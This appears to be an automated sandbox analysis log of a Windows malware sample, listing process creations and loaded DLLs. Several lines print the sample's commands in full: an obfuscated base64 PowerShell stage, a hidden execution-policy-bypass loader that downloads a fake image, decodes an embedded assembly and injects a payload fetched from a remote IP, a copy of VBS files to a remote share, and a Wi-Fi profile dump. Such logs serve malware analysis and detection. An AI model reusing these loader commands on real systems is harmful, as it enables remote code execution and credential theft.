          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntmarta.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: napinsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wshbth.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: nlaapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
